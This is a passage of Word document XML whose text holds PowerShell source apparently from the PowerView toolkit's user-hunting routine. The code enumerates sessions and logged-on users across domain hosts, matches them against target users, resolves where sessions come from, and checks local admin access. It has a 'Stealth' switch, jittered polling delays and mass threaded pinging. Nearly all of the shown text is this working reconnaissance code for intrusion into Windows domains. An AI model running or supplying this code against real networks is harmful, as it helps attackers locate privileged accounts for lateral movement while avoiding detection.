    <w:p w14:paraId="2F3F7112" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FE193D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1397A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7036FB1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084CD392" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D2C88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser | Add-Member Noteproperty 'UserDomain' $_.MemberDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82227E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E720161" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ABDC9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3BBFAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser | Add-Member Noteproperty 'SessionFrom' $CName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134B8FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EA9D91D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    # Try to resolve the DNS hostname of $Cname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB1C81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40815B27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D92BC49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member NoteProperty 'SessionFromName' $CnameDNSName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E238C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB68254" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB2D3DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member NoteProperty 'SessionFromName' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2076AF29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A84A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E2EA199" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    # see if we're checking to see if we have local admin access on this machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA629F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    if ($CheckAccess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A620F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $Admin = Invoke-CheckLocalAdminAccess -ComputerName $CName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A7359" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24380735" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147948FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF19F07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E7ADA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BD695" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301406B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $FoundUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B528C9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8958E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE6FD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD512F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245B711" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if(!$Stealth) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CF47F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if we're not 'stealthy', enumerate loggedon users as well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C8680" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $LoggedOn = Get-NetLoggedon -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10B897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        ForEach ($User in $LoggedOn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B863566" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $UserName = $User.wkui1_username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB5AE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # TODO: translate domain to authoratative name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B2962" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            #   then match domain name ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F69CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $UserDomain = $User.wkui1_logon_domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA7EBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="503D0B60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # make sure wet have a result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA3F3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if (($UserName) -and ($UserName.trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588C713" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B49FB6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F17B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F7D3A72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Proceed = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237EA07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    if($DomainShortName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619D460" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        if ($DomainShortName.ToLower() -ne $UserDomain.ToLower()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F54BCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $Proceed = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5869EB03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269AF5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79D52F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $Proceed = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF447B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FF094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D2121" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    if($Proceed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9CADC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C38D61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711383CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'UserDomain' $UserDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B426D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42D827" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B2609" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F0741" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'SessionFrom' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6163E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser | Add-Member Noteproperty 'SessionFromName' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F002E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CABD1C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        # see if we're checking to see if we have local admin access on this machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B8DE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        if ($CheckAccess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F527E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $Admin = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132CB6D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F34BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06472050" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF54E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                            $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E58484D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDAA8E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8DCA22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $FoundUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409040A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C6F39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13DEE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A63A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD2E78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC8BA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79E6929B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($Poll -gt 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9337C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF7D53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A079D30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                } While ($Poll -gt 0 -and $Timer.Elapsed.TotalSeconds -lt $Poll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51261194" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D3E1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4FF8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CD1B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18552462" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561761B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56FCAD9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D6F00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B81C5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4224A23B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12707CBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E2732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2560C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'TargetUsers' = $TargetUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BDCA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'CurrentUser' = $CurrentUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1C02C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Stealth' = $Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A2D51C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'DomainShortName' = $DomainShortName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D66255" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Poll' = $Poll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49874031" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Delay' = $Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B669C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Jitter' = $Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45049FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D746C1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5664AE83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87BBD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E28A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAA911D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="368E0ECE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DAC5B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEA40A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147E8D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBEBA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C28F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC024A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B80AF11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C90561" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E02ACA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
